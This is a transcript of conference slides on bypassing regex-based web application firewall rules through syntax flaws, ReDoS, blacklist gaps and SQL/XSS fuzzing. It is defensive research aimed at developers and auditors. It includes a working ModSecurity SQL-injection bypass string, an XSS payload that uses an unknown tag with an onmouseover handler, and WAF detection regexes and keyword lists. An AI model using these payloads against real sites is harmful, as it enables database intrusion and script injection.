web application firewalls: attacking detection logic ... · web application firewalls: attacking...
TRANSCRIPT
![Page 1: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/1.jpg)
![Page 2: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/2.jpg)
Web Application Firewalls: Attacking detection logic
mechanisms
Vladimir Ivanov @httpsonly
![Page 3: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/3.jpg)
/whoam/i
MSc Information Security (merit) - RHUL (UK) Web App penetration tester at Positive Technologies (ptsecurity.com)
![Page 4: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/4.jpg)
Agenda 1. Introduction
2. Detection logic in WAF
3. METHOD I: Syntax bypass
4. METHOD II: Logical bypass
5. METHOD III: Unexpected by primary logic bypass
6. Takeaways
![Page 5: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/5.jpg)
Motivation The Standoff:
1. Attackers. Mix of various techniques, rarely understand root cause. 2. Defenders. WAFs protect against automative testing, every vendor implements additional functionality.
Result: No careful whitebox analysis
![Page 6: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/6.jpg)
WAF workflow example Stage 1: Parse HTTP(s) packet from client
Stage 2: Chose rule set depending on type of incoming parameter
Stage 3: Normalise data
Stage 4: Apply detection logic
Stage 5: Make detection decision
![Page 7: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/7.jpg)
WAF workflow: Detection logic
OWASP CRS 2
OWASP CRS 3dev OWASP CRS 3rc
PHPIDS Comodo rules
QuickDefenceWaf
Vultureproject
Waf.red
ShadowD
etc…
Tokenizer
libinjection
Reputation
repsheet
Score Builder
NAXSI
Anomaly detection
HMM
![Page 8: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/8.jpg)
Regular expression… …is a sequence of characters that define a search pattern
(?i)(<script[^>]*>.*?) 1 2 3
![Page 9: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/9.jpg)
Sources 500+ regular expressions:
• OWASP CRS2 (modsecurity)
• OWASP CRS3dev (modsecurity)
• OWASP CRS3rc1 (modsecurity)
• PHPIDS
• Comodo WAF
• QuickDefense
43.3%
43.8%
12.8% XSS
SQL
Other: LFI/RFI, PHP, OS exec, etc
![Page 10: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/10.jpg)
Results
300+ potential bypasses
Most “vulnerable”: PHPIDS (E = 1,15)
Less “vulnerable”: Comodo WAF (E = 0,32)
Most “exploitable”: OWASP CRS3-rc (E = 0,89)
E = Potential bypasses / Total rules
![Page 11: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/11.jpg)
METHOD I: Syntax bypass Of regular expressions
Enumerate all possible and invent all impossible mistakes
![Page 12: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/12.jpg)
What’s wrong with regexp? Level: Easy
!
![Page 13: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/13.jpg)
What’s wrong with regexp? Level: Easy
(?i: ) 1. atTacKpAyloAd
!
![Page 14: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/14.jpg)
What’s wrong with regexp? Level: Easy
(?i: )
^ $
1. atTacKpAyloAd
2. attackpayload
!
![Page 15: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/15.jpg)
What’s wrong with regexp? Level: Easy
(?i: )
^ $
{1,3}
1. atTacKpAyloAd
2. attackpayload
3. attackpayloadattackpayloadattackpayloadattackpa…
!
![Page 16: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/16.jpg)
What’s wrong with regexp? Level: Medium
ReDoS 1.
![Page 17: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/17.jpg)
What’s wrong with regexp? Level: Medium
ReDoS
Repetitions: + *
1.
2.
![Page 18: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/18.jpg)
What’s wrong with regexp? Level: Medium
ReDoS
Repetitions: + *
Blacklisting wildcards in a set
1.
2.
3.
![Page 19: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/19.jpg)
What’s wrong with regexp? Level: Advanced
Non-standard diapasons 1.
POSIX character classes 2.
Operators 3.
Backlinks, wildcards 4.
![Page 20: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/20.jpg)
Regular expressions: Security cheatsheet
2 parts: theoretical "whitepaper" and practical "code".
Hack regular expressions with regular expressions!
+ SAST: Assists with whitebox analysis of regular expressions in source code of your projects
+ Low false positives: Focused on finding high severity security issues
+ Opensource on Github!
- Does not dynamically analyze lexis (yet).
![Page 21: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/21.jpg)
https://github.com/attackercan/ REGEXP-SECURITY-CHEATSHEET
![Page 22: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/22.jpg)
Target audience
Not only WAFs use Reg Exp Detection Logic:
• XSS Auditors
• Backend parsers
• Front-end analyzers
Developers, security auditors, bughunters
![Page 23: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/23.jpg)
DEMO
Regex Security Cheatsheet DEMO
![Page 24: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/24.jpg)
^(?:ht|f)tps?://(.*)$
![Page 25: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/25.jpg)
Comodo WAF: Att4ck is bl0cked!
![Page 26: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/26.jpg)
(\bunion[\s\\*\/]{1,100}?\bselect\b)
QuickDefense WAF: Attackers are lazy enough
![Page 27: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/27.jpg)
JavaScript checker in real-life web app
![Page 28: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/28.jpg)
JavaScript checker in real-life web app
We can make ReDoS on client-side by supplying specially crafted email as input.
![Page 29: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/29.jpg)
JavaScript checker in real-life web app
We can make ReDoS on client-side by supplying specially crafted email as input.
But what if backend also has same regex for checking?
![Page 30: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/30.jpg)
JavaScript checker in real-life web app
We can make ReDoS on client-side by supplying specially crafted email as input.
But what if backend also has same regex for checking?
![Page 31: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/31.jpg)
EdgeHTML.dll
![Page 32: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/32.jpg)
EdgeHTML.dll
IE+Edge XSS Auditor
![Page 33: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/33.jpg)
EdgeHTML.dll
IE+Edge XSS Auditor Result: blocked
![Page 34: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/34.jpg)
EdgeHTML.dll
Regexp bypass.
Result: alert!
Thx @ahack_ru for payload
![Page 35: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/35.jpg)
(?:div|like|between|and|not )\s+\w)
![Page 36: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/36.jpg)
(?:div|like|between|and|not )\s+\w)
https://github.com/PHPIDS/PHPIDS/commit/667e63af93e8fd2ee4df99dd98cb41acdf480906
![Page 37: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/37.jpg)
What’s next? 1. Identify WAF vendor and version using “signature” vulnerabilities.
![Page 38: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/38.jpg)
What’s next? 1. Identify WAF vendor and version using “signature” vulnerabilities.
2. Reveal and apply bypasses depending on a situation
![Page 39: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/39.jpg)
What’s next? 1. Identify WAF vendor and version using “signature” vulnerabilities.
2. Reveal and apply bypasses depending on a situation
3. Craft string which bypasses all regexp-based rules.
![Page 40: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/40.jpg)
ModSecurity SQLi Bypass Basic SQLi is given:
All SQLi Regexp bypass:
-1'OR#foo
id=IF#foo
(ASCII#foo
((SELECT-version()/1.))<250,1,0) #
![Page 41: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/41.jpg)
What’s next? 1. Identify WAF vendor and version using “signature” vulnerabilities.
2. Reveal and apply bypasses depending on a situation
3. Craft string which bypasses all regexp-based rules.
4. …
![Page 42: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/42.jpg)
What’s next? 1. Identify WAF vendor and version using “signature” vulnerabilities.
2. Reveal and apply bypasses depending on a situation
3. Craft string which bypasses all regexp-based rules.
4. …
5. Dig deeper!
![Page 43: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/43.jpg)
METHOD II: Logical bypass Manual review analysis
+Non-standard findings - Subjective
![Page 44: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/44.jpg)
Blacklists fail #1
https://github.com/netty/netty/issues/5535
![Page 45: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/45.jpg)
Blacklists fail #2, 3, 4, …
NAXSI 0x 0b10101
b’10101’
ModSecurity 2.2.9
XSS Rule 973300
<(a|abbr|acronym|... <non_existing_tag
onmouseover=alert(1)>hover this!
ModSecurity 3RC-1
OS-Commands.data
adduser useradd
ipconfig ifconfig
copy, move cp, mv
![Page 46: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/46.jpg)
Researches success
@mazen160
![Page 47: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/47.jpg)
Researches success
@mazen160
![Page 48: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/48.jpg)
METHOD III: Unexpected by primary logic bypass
![Page 49: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/49.jpg)
XSS Fuzzer
![Page 50: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/50.jpg)
XSS Fuzzer
![Page 51: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/51.jpg)
libinjection
![Page 52: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/52.jpg)
libinjection
![Page 53: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/53.jpg)
https://github.com/attackercan/ CPP-SQL-FUZZER
• Receive SQL query as input • Fuzz it (mysql.h, SQLAPI.h, ODBC?) • Record every query except syntax errors • Parse output! • Current MySQL.h perfomance: 21M symbols in <1 hour; speed = 9k queries per second (QPS). • Up to 1.6M QPS!
![Page 54: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/54.jpg)
SQL fuzzer
![Page 55: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/55.jpg)
SQL fuzzer: Examples
![Page 56: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/56.jpg)
SQL Fuzzer: Results
![Page 57: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/57.jpg)
Contribution
• Regexp security cheatsheet + SAST
• Blacklist improvement
• SQL Fuzzer: Classified tables
https://github.com/attackercan
![Page 58: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/58.jpg)
TODO
1. Update Regular Expression Security Cheatsheet
2. Create regular expression Dynamic analysis tool
3. “Clever fuzzing” + scalable (MySQL allows 1.6M QPS)
![Page 59: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/59.jpg)
Questions?
![Page 60: Web Application Firewalls: Attacking detection logic ... · Web Application Firewalls: Attacking detection logic mechanisms Vladimir Ivanov @httpsonly /whoam/i MSc Information Security](https://reader030.vdocuments.us/reader030/viewer/2022040913/5e893bd1f341654e79323146/html5/thumbnails/60.jpg)
Thank you
Arseniy Sharoglazov <[email protected]> (Contribution to Regex Security Cheatsheet)
Dmitry Serebryannikov @dsrbr (Contribution to SQL fuzzer)
Andrey Evlanin @xpathmaster
All @ptsecurity team ;)